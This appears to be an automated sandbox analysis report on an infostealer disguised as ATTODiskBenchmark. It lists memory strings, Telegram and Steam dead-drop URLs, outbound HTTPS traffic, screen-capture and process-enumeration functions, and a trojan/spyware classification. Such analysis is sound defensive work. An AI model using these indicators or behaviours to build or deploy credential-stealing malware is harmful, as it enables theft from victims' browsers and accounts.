Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://store.steampowered.com/news/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: DHCBGD.2.dr String found in binary or memory: https://support.mozilla.org
Source: DHCBGD.2.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: DHCBGD.2.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/JDc
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010C4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/fun88rockskek
Source: 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/fun88rockskekHn
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/fun88rockskekcarrghttps://steamcommunity.com/profiles/76561199786602107g0b4csql.dllsqlp
Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001088000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001058000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/fun88rockskeki
Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/lpnjoke
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332683863.00000000027E0000.00000040.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
Source: 7ZthFNAqYp.exe, 00000002.00000003.2679355376.00000000010D4000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://web.telegram.org
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: DHCBGD.2.dr String found in binary or memory: https://www.mozilla.org
Source: DHCBGD.2.dr String found in binary or memory: https://www.mozilla.org#
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399181312.0000000019C1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: DHCBGD.2.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399181312.0000000019C1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: DHCBGD.2.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: DHCBGD.2.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50011
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50014
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown Network traffic detected: HTTP traffic on port 50003 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50008 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50009 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50011 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50006
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50009
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50008
Source: unknown Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50003
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50006 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49993 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49940 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.192.247.89:443 -> 192.168.2.6:49988 version: TLS 1.2
Source: unknown HTTPS traffic detected: 95.217.220.103:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00931F2A CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 2_2_00931F2A

System Summary

Source: C:\Users\user\Desktop\7ZthFNAqYp.exe File dump: AttoConvertVideo.exe.0.dr 979379375
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0092145B GetCurrentProcess,NtQueryInformationProcess, 2_2_0092145B
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0093C603 2_2_0093C603
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0093B8A3 2_2_0093B8A3
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0094DAC3 2_2_0094DAC3
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0094D353 2_2_0094D353
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00939698 2_2_00939698
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0094CEBE 2_2_0094CEBE
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0094DEAB 2_2_0094DEAB
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0094D6F1 2_2_0094D6F1
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA4ECC0 2_2_6CA4ECC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAAECD0 2_2_6CAAECD0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB2AC30 2_2_6CB2AC30
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB16C00 2_2_6CB16C00
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA5AC60 2_2_6CA5AC60
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA54DB0 2_2_6CA54DB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAE6D90 2_2_6CAE6D90
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CBDCDC0 2_2_6CBDCDC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CBD8D20 2_2_6CBD8D20
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB1ED70 2_2_6CB1ED70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB7AD50 2_2_6CB7AD50
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAD6E90 2_2_6CAD6E90
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA5AEC0 2_2_6CA5AEC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAF0EC0 2_2_6CAF0EC0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB30E20 2_2_6CB30E20
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAEEE70 2_2_6CAEEE70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB98FB0 2_2_6CB98FB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA5EFB0 2_2_6CA5EFB0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB2EFF0 2_2_6CB2EFF0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA50FE0 2_2_6CA50FE0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB90F20 2_2_6CB90F20
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA56F10 2_2_6CA56F10
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB12F70 2_2_6CB12F70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CABEF40 2_2_6CABEF40
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB568E0 2_2_6CB568E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAA0820 2_2_6CAA0820
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CADA820 2_2_6CADA820
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB24840 2_2_6CB24840
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB109B0 2_2_6CB109B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAE09A0 2_2_6CAE09A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB0A9A0 2_2_6CB0A9A0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB6C9E0 2_2_6CB6C9E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA849F0 2_2_6CA849F0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAA6900 2_2_6CAA6900
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA88960 2_2_6CA88960
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CACEA80 2_2_6CACEA80
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB08A30 2_2_6CB08A30
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAFEA00 2_2_6CAFEA00
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CACCA70 2_2_6CACCA70
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAF0BA0 2_2_6CAF0BA0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB56BE0 2_2_6CB56BE0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB7A480 2_2_6CB7A480
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA964D0 2_2_6CA964D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAEA4D0 2_2_6CAEA4D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB4420 2_2_6CAB4420
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CADA430 2_2_6CADA430
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA68460 2_2_6CA68460
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA445B0 2_2_6CA445B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB1A5E0 2_2_6CB1A5E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CADE5F0 2_2_6CADE5F0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB2560 2_2_6CAB2560
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAF0570 2_2_6CAF0570
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB98550 2_2_6CB98550
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAA8540 2_2_6CAA8540
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB54540 2_2_6CB54540
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAAE6E0 2_2_6CAAE6E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAEE6E0 2_2_6CAEE6E0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA746D0 2_2_6CA746D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAAC650 2_2_6CAAC650
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA7A7D0 2_2_6CA7A7D0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAD0700 2_2_6CAD0700
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CB2C0B0 2_2_6CB2C0B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA600B0 2_2_6CA600B0
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CA48090 2_2_6CA48090
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: String function: 6CB89F30 appears 31 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: String function: 009247E8 appears 38 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: String function: 6CA73620 appears 73 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: String function: 009304BC appears 37 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: String function: 6CA79B10 appears 73 times
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: String function: 009305DE appears 71 times
Source: 7ZthFNAqYp.exe Static PE information: Resource name: None type: DOS executable (COM)
Source: AttoConvertVideo.exe.0.dr Static PE information: Resource name: None type: DOS executable (COM)
Source: 7ZthFNAqYp.exe Binary or memory string: OriginalFilename vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000000.00000000.2134642418.000000000082F000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000000.00000002.2332999034.0000000002E74000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000000.00000002.2331724187.0000000000833000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3406548089.000000002C66D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3410535288.0000000038547000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3392292376.000000000082F000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe, 00000002.00000002.3417574339.000000006FD92000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe Binary or memory string: OriginalFilenameATTODiskBenchmark.exeH vs 7ZthFNAqYp.exe
Source: 7ZthFNAqYp.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/22@3/4
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_6CAB0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 2_2_6CAB0300
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0093147A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 2_2_0093147A
Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_0093196C __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z,__EH_prolog3_catch,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear, 2_2_0093196C
